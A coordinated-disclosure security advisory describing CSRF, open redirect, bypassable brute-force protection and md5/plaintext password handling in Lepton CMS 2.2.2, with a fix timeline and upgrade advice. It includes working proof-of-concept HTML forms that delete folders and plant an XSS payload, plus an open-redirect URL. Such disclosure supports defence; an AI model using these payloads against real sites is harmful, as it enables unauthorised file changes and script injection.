Lepton 2.2.2: CSRF, Open Redirect, Insecure Bruteforce Protection & Password Handling
Date: 2016-11-10 10:46:261. Introduction
| Affected Product: | LEPTON 2.2.2 stable |
| Fixed in: | 2.3.0 |
| Fixed Version Link: | http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php |
| Vendor Website: | http://www.lepton-cms.org/ |
| Vulnerability Type: | CSRF, Open Redirect, Insecure Bruteforce Protection & Password Handling |
| Remote Exploitable: | Yes |
| Reported to vendor: | 09/05/2016 |
| Disclosed to public: | 11/10/2016 |
| Release mode: | Coordinated Release |
| CVE: | n/a |
| Credits | Tim Coen of Curesec GmbH |
2. Overview
Lepton is a content management system written in PHP. In version 2.2.2, it contains various low to medium impact issues. The functionality that operates on files and folders is vulnerable to CSRF which may lead to XSS, the logout is vulnerable to Open Redirect, the in-build bruteforce protection can be easily bypassed, and passwords are hashed with md5 and send out via email in plaintext.
3. Details
CSRF
CVSS: Medium 4.0 AV:N/AC:H/Au:N/C:N/I:P/A:P
Description: All actions on folders and files are missing CSRF protection. Because of this, an attacker can delete, create, or rename folders and files. An attacker could for example create .html files which would lead to an XSS attack.
Proof of Concept:
Delete Folder: <html> <body> <form action="http://localhost//LEPTON_stable_2.2.2/upload/modules/tiny_mce_4/tiny_mce/filemanager/execute.php?action=delete_folder" method="POST"> <input type="hidden" name="path" value="test>" /> <input type="hidden" name="name" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html> Create File: <html> <body> <form action="http://localhost//LEPTON_stable_2.2.2/upload/modules/tiny_mce_4/tiny_mce/filemanager/execute.php?action=create_file" method="POST"> <input type="hidden" name="path" value="" /> <input type="hidden" name="name" value="test.html" /> <input type="hidden" name="new_content" value="<img src=no onerror=alert(1)>" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Open Redirect
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:NP
Description: The redirect parameter of the logout script is vulnerable to open redirect.
Proof of Concept:
http://localhost/LEPTON_stable_2.2.2/upload/account/logout.php?redirect=http://google.com
Insufficient Bruteforce Protection
Description: The bruteforce protection works on a per-session base, which is easily bypassed by an attacker by simply requesting a new session by not sending the current, locked session information. The current bruteforce protection may provide a false sense of security and should thus be removed or changed.
Code:
if($_SESSION['ATTEMPS'] > $this->max_attemps) { $this->warn(); }
Password Handling
The password reset functionality sends a newly generated password in plaintext via email, which is not recommended.
Additionally, md5 is used for hashing, which is also not recommended.
4. Solution
To mitigate this issue please upgrade at least to version 2.3.0:
http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php
Please note that a newer version might already be available.
5. Report Timeline
| 09/05/2016 | Informed Vendor about Issue |
| 09/06/2016 | Vendor requests 60 days to release fix |
| 10/25/2016 | Vendor releases fix |
| 11/10/2016 | Disclosed to public |